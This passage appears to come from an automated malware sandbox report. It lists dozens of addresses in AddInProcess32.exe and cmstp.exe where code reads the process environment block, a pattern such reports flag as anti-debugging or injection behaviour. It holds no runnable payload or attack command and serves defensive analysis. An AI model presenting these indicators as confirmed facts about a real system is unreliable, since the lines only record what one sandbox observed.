          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396CF0 mov eax, dword ptr fs:[00000030h]7_2_01396CF0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396CF0 mov eax, dword ptr fs:[00000030h]7_2_01396CF0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396CF0 mov eax, dword ptr fs:[00000030h]7_2_01396CF0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013158EC mov eax, dword ptr fs:[00000030h]7_2_013158EC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E8CD6 mov eax, dword ptr fs:[00000030h]7_2_013E8CD6
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AB8D0 mov eax, dword ptr fs:[00000030h]7_2_013AB8D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AB8D0 mov ecx, dword ptr fs:[00000030h]7_2_013AB8D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AB8D0 mov eax, dword ptr fs:[00000030h]7_2_013AB8D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AB8D0 mov eax, dword ptr fs:[00000030h]7_2_013AB8D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AB8D0 mov eax, dword ptr fs:[00000030h]7_2_013AB8D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AB8D0 mov eax, dword ptr fs:[00000030h]7_2_013AB8D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134E730 mov eax, dword ptr fs:[00000030h]7_2_0134E730
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01314F2E mov eax, dword ptr fs:[00000030h]7_2_01314F2E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01314F2E mov eax, dword ptr fs:[00000030h]7_2_01314F2E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133F716 mov eax, dword ptr fs:[00000030h]7_2_0133F716
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D131B mov eax, dword ptr fs:[00000030h]7_2_013D131B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AFF10 mov eax, dword ptr fs:[00000030h]7_2_013AFF10
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AFF10 mov eax, dword ptr fs:[00000030h]7_2_013AFF10
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E070D mov eax, dword ptr fs:[00000030h]7_2_013E070D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E070D mov eax, dword ptr fs:[00000030h]7_2_013E070D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134A70E mov eax, dword ptr fs:[00000030h]7_2_0134A70E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134A70E mov eax, dword ptr fs:[00000030h]7_2_0134A70E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01343B7A mov eax, dword ptr fs:[00000030h]7_2_01343B7A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01343B7A mov eax, dword ptr fs:[00000030h]7_2_01343B7A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131DB60 mov ecx, dword ptr fs:[00000030h]7_2_0131DB60
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132FF60 mov eax, dword ptr fs:[00000030h]7_2_0132FF60
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E8F6A mov eax, dword ptr fs:[00000030h]7_2_013E8F6A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E8B58 mov eax, dword ptr fs:[00000030h]7_2_013E8B58
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131F358 mov eax, dword ptr fs:[00000030h]7_2_0131F358
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131DB40 mov eax, dword ptr fs:[00000030h]7_2_0131DB40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132EF40 mov eax, dword ptr fs:[00000030h]7_2_0132EF40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01344BAD mov eax, dword ptr fs:[00000030h]7_2_01344BAD
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01344BAD mov eax, dword ptr fs:[00000030h]7_2_01344BAD
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01344BAD mov eax, dword ptr fs:[00000030h]7_2_01344BAD
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E5BA5 mov eax, dword ptr fs:[00000030h]7_2_013E5BA5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01342397 mov eax, dword ptr fs:[00000030h]7_2_01342397
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134B390 mov eax, dword ptr fs:[00000030h]7_2_0134B390
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01328794 mov eax, dword ptr fs:[00000030h]7_2_01328794
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01397794 mov eax, dword ptr fs:[00000030h]7_2_01397794
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01397794 mov eax, dword ptr fs:[00000030h]7_2_01397794
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01397794 mov eax, dword ptr fs:[00000030h]7_2_01397794
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D138A mov eax, dword ptr fs:[00000030h]7_2_013D138A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013CD380 mov ecx, dword ptr fs:[00000030h]7_2_013CD380
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01321B8F mov eax, dword ptr fs:[00000030h]7_2_01321B8F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01321B8F mov eax, dword ptr fs:[00000030h]7_2_01321B8F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013537F5 mov eax, dword ptr fs:[00000030h]7_2_013537F5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013403E2 mov eax, dword ptr fs:[00000030h]7_2_013403E2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013403E2 mov eax, dword ptr fs:[00000030h]7_2_013403E2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013403E2 mov eax, dword ptr fs:[00000030h]7_2_013403E2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013403E2 mov eax, dword ptr fs:[00000030h]7_2_013403E2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013403E2 mov eax, dword ptr fs:[00000030h]7_2_013403E2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013403E2 mov eax, dword ptr fs:[00000030h]7_2_013403E2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133DBE9 mov eax, dword ptr fs:[00000030h]7_2_0133DBE9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013953CA mov eax, dword ptr fs:[00000030h]7_2_013953CA
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013953CA mov eax, dword ptr fs:[00000030h]7_2_013953CA
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013CFE3F mov eax, dword ptr fs:[00000030h]7_2_013CFE3F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131E620 mov eax, dword ptr fs:[00000030h]7_2_0131E620
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01354A2C mov eax, dword ptr fs:[00000030h]7_2_01354A2C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01354A2C mov eax, dword ptr fs:[00000030h]7_2_01354A2C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01315210 mov eax, dword ptr fs:[00000030h]7_2_01315210
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01315210 mov ecx, dword ptr fs:[00000030h]7_2_01315210
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01315210 mov eax, dword ptr fs:[00000030h]7_2_01315210
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01315210 mov eax, dword ptr fs:[00000030h]7_2_01315210
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131AA16 mov eax, dword ptr fs:[00000030h]7_2_0131AA16
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131AA16 mov eax, dword ptr fs:[00000030h]7_2_0131AA16
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134A61C mov eax, dword ptr fs:[00000030h]7_2_0134A61C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134A61C mov eax, dword ptr fs:[00000030h]7_2_0134A61C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01333A1C mov eax, dword ptr fs:[00000030h]7_2_01333A1C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131C600 mov eax, dword ptr fs:[00000030h]7_2_0131C600
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131C600 mov eax, dword ptr fs:[00000030h]7_2_0131C600
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131C600 mov eax, dword ptr fs:[00000030h]7_2_0131C600
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01348E00 mov eax, dword ptr fs:[00000030h]7_2_01348E00
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1608 mov eax, dword ptr fs:[00000030h]7_2_013D1608
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01328A0A mov eax, dword ptr fs:[00000030h]7_2_01328A0A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133AE73 mov eax, dword ptr fs:[00000030h]7_2_0133AE73
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133AE73 mov eax, dword ptr fs:[00000030h]7_2_0133AE73
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133AE73 mov eax, dword ptr fs:[00000030h]7_2_0133AE73
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133AE73 mov eax, dword ptr fs:[00000030h]7_2_0133AE73
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133AE73 mov eax, dword ptr fs:[00000030h]7_2_0133AE73
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0135927A mov eax, dword ptr fs:[00000030h]7_2_0135927A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013CB260 mov eax, dword ptr fs:[00000030h]7_2_013CB260
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013CB260 mov eax, dword ptr fs:[00000030h]7_2_013CB260
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E8A62 mov eax, dword ptr fs:[00000030h]7_2_013E8A62
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132766D mov eax, dword ptr fs:[00000030h]7_2_0132766D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013DEA55 mov eax, dword ptr fs:[00000030h]7_2_013DEA55
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013A4257 mov eax, dword ptr fs:[00000030h]7_2_013A4257
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01319240 mov eax, dword ptr fs:[00000030h]7_2_01319240
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01319240 mov eax, dword ptr fs:[00000030h]7_2_01319240
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01319240 mov eax, dword ptr fs:[00000030h]7_2_01319240
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01319240 mov eax, dword ptr fs:[00000030h]7_2_01319240
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01327E41 mov eax, dword ptr fs:[00000030h]7_2_01327E41
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01327E41 mov eax, dword ptr fs:[00000030h]7_2_01327E41
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01327E41 mov eax, dword ptr fs:[00000030h]7_2_01327E41
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01327E41 mov eax, dword ptr fs:[00000030h]7_2_01327E41
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01327E41 mov eax, dword ptr fs:[00000030h]7_2_01327E41
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01327E41 mov eax, dword ptr fs:[00000030h]7_2_01327E41
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132AAB0 mov eax, dword ptr fs:[00000030h]7_2_0132AAB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132AAB0 mov eax, dword ptr fs:[00000030h]7_2_0132AAB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134FAB0 mov eax, dword ptr fs:[00000030h]7_2_0134FAB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013152A5 mov eax, dword ptr fs:[00000030h]7_2_013152A5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013152A5 mov eax, dword ptr fs:[00000030h]7_2_013152A5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013152A5 mov eax, dword ptr fs:[00000030h]7_2_013152A5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013152A5 mov eax, dword ptr fs:[00000030h]7_2_013152A5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013152A5 mov eax, dword ptr fs:[00000030h]7_2_013152A5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E0EA5 mov eax, dword ptr fs:[00000030h]7_2_013E0EA5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E0EA5 mov eax, dword ptr fs:[00000030h]7_2_013E0EA5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E0EA5 mov eax, dword ptr fs:[00000030h]7_2_013E0EA5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013946A7 mov eax, dword ptr fs:[00000030h]7_2_013946A7
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134D294 mov eax, dword ptr fs:[00000030h]7_2_0134D294
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134D294 mov eax, dword ptr fs:[00000030h]7_2_0134D294
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AFE87 mov eax, dword ptr fs:[00000030h]7_2_013AFE87
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013276E2 mov eax, dword ptr fs:[00000030h]7_2_013276E2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01342AE4 mov eax, dword ptr fs:[00000030h]7_2_01342AE4
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013416E0 mov ecx, dword ptr fs:[00000030h]7_2_013416E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E8ED6 mov eax, dword ptr fs:[00000030h]7_2_013E8ED6
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01358EC7 mov eax, dword ptr fs:[00000030h]7_2_01358EC7
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013436CC mov eax, dword ptr fs:[00000030h]7_2_013436CC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013CFEC0 mov eax, dword ptr fs:[00000030h]7_2_013CFEC0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01342ACB mov eax, dword ptr fs:[00000030h]7_2_01342ACB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6BC2C mov eax, dword ptr fs:[00000030h]17_2_04E6BC2C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6002D mov eax, dword ptr fs:[00000030h]17_2_04E6002D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6002D mov eax, dword ptr fs:[00000030h]17_2_04E6002D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6002D mov eax, dword ptr fs:[00000030h]17_2_04E6002D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6002D mov eax, dword ptr fs:[00000030h]17_2_04E6002D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6002D mov eax, dword ptr fs:[00000030h]17_2_04E6002D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4B02A mov eax, dword ptr fs:[00000030h]17_2_04E4B02A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4B02A mov eax, dword ptr fs:[00000030h]17_2_04E4B02A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4B02A mov eax, dword ptr fs:[00000030h]17_2_04E4B02A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4B02A mov eax, dword ptr fs:[00000030h]17_2_04E4B02A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB6C0A mov eax, dword ptr fs:[00000030h]17_2_04EB6C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB6C0A mov eax, dword ptr fs:[00000030h]17_2_04EB6C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB6C0A mov eax, dword ptr fs:[00000030h]17_2_04EB6C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB6C0A mov eax, dword ptr fs:[00000030h]17_2_04EB6C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F04015 mov eax, dword ptr fs:[00000030h]17_2_04F04015
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F04015 mov eax, dword ptr fs:[00000030h]17_2_04F04015
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]17_2_04EF1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]17_2_04EF1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]17_2_04EF1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]17_2_04EF1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]17_2_04EF1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]17_2_04EF1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]17_2_04EF1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]17_2_04EF1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]17_2_04EF1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]17_2_04EF1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]17_2_04EF1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]17_2_04EF1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]17_2_04EF1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]17_2_04EF1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB7016 mov eax, dword ptr fs:[00000030h]17_2_04EB7016
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB7016 mov eax, dword ptr fs:[00000030h]17_2_04EB7016
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB7016 mov eax, dword ptr fs:[00000030h]17_2_04EB7016
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F0740D mov eax, dword ptr fs:[00000030h]17_2_04F0740D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F0740D mov eax, dword ptr fs:[00000030h]17_2_04F0740D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F0740D mov eax, dword ptr fs:[00000030h]17_2_04F0740D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3B1E1 mov eax, dword ptr fs:[00000030h]17_2_04E3B1E1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3B1E1 mov eax, dword ptr fs:[00000030h]17_2_04E3B1E1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3B1E1 mov eax, dword ptr fs:[00000030h]17_2_04E3B1E1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EC41E8 mov eax, dword ptr fs:[00000030h]17_2_04EC41E8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4D5E0 mov eax, dword ptr fs:[00000030h]17_2_04E4D5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4D5E0 mov eax, dword ptr fs:[00000030h]17_2_04E4D5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EE8DF1 mov eax, dword ptr fs:[00000030h]17_2_04EE8DF1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E661A0 mov eax, dword ptr fs:[00000030h]17_2_04E661A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E661A0 mov eax, dword ptr fs:[00000030h]17_2_04E661A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E635A1 mov eax, dword ptr fs:[00000030h]17_2_04E635A1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB69A6 mov eax, dword ptr fs:[00000030h]17_2_04EB69A6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E61DB5 mov eax, dword ptr fs:[00000030h]17_2_04E61DB5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E61DB5 mov eax, dword ptr fs:[00000030h]17_2_04E61DB5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E61DB5 mov eax, dword ptr fs:[00000030h]17_2_04E61DB5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB51BE mov eax, dword ptr fs:[00000030h]17_2_04EB51BE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB51BE mov eax, dword ptr fs:[00000030h]17_2_04EB51BE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB51BE mov eax, dword ptr fs:[00000030h]17_2_04EB51BE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB51BE mov eax, dword ptr fs:[00000030h]17_2_04EB51BE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6A185 mov eax, dword ptr fs:[00000030h]17_2_04E6A185
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5C182 mov eax, dword ptr fs:[00000030h]17_2_04E5C182
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E62581 mov eax, dword ptr fs:[00000030h]17_2_04E62581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E62581 mov eax, dword ptr fs:[00000030h]17_2_04E62581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E62581 mov eax, dword ptr fs:[00000030h]17_2_04E62581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E62581 mov eax, dword ptr fs:[00000030h]17_2_04E62581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E32D8A mov eax, dword ptr fs:[00000030h]17_2_04E32D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E32D8A mov eax, dword ptr fs:[00000030h]17_2_04E32D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E32D8A mov eax, dword ptr fs:[00000030h]17_2_04E32D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E32D8A mov eax, dword ptr fs:[00000030h]17_2_04E32D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E32D8A mov eax, dword ptr fs:[00000030h]17_2_04E32D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E62990 mov eax, dword ptr fs:[00000030h]17_2_04E62990
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6FD9B mov eax, dword ptr fs:[00000030h]17_2_04E6FD9B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6FD9B mov eax, dword ptr fs:[00000030h]17_2_04E6FD9B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3C962 mov eax, dword ptr fs:[00000030h]17_2_04E3C962
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3B171 mov eax, dword ptr fs:[00000030h]17_2_04E3B171
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3B171 mov eax, dword ptr fs:[00000030h]17_2_04E3B171
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5C577 mov eax, dword ptr fs:[00000030h]17_2_04E5C577
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5C577 mov eax, dword ptr fs:[00000030h]17_2_04E5C577
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5B944 mov eax, dword ptr fs:[00000030h]17_2_04E5B944
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5B944 mov eax, dword ptr fs:[00000030h]17_2_04E5B944
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E73D43 mov eax, dword ptr fs:[00000030h]17_2_04E73D43
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB3540 mov eax, dword ptr fs:[00000030h]17_2_04EB3540
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E57D50 mov eax, dword ptr fs:[00000030h]17_2_04E57D50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F08D34 mov eax, dword ptr fs:[00000030h]17_2_04F08D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E54120 mov eax, dword ptr fs:[00000030h]17_2_04E54120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E54120 mov eax, dword ptr fs:[00000030h]17_2_04E54120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E54120 mov eax, dword ptr fs:[00000030h]17_2_04E54120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E54120 mov eax, dword ptr fs:[00000030h]17_2_04E54120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E54120 mov ecx, dword ptr fs:[00000030h]17_2_04E54120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]17_2_04E43D34
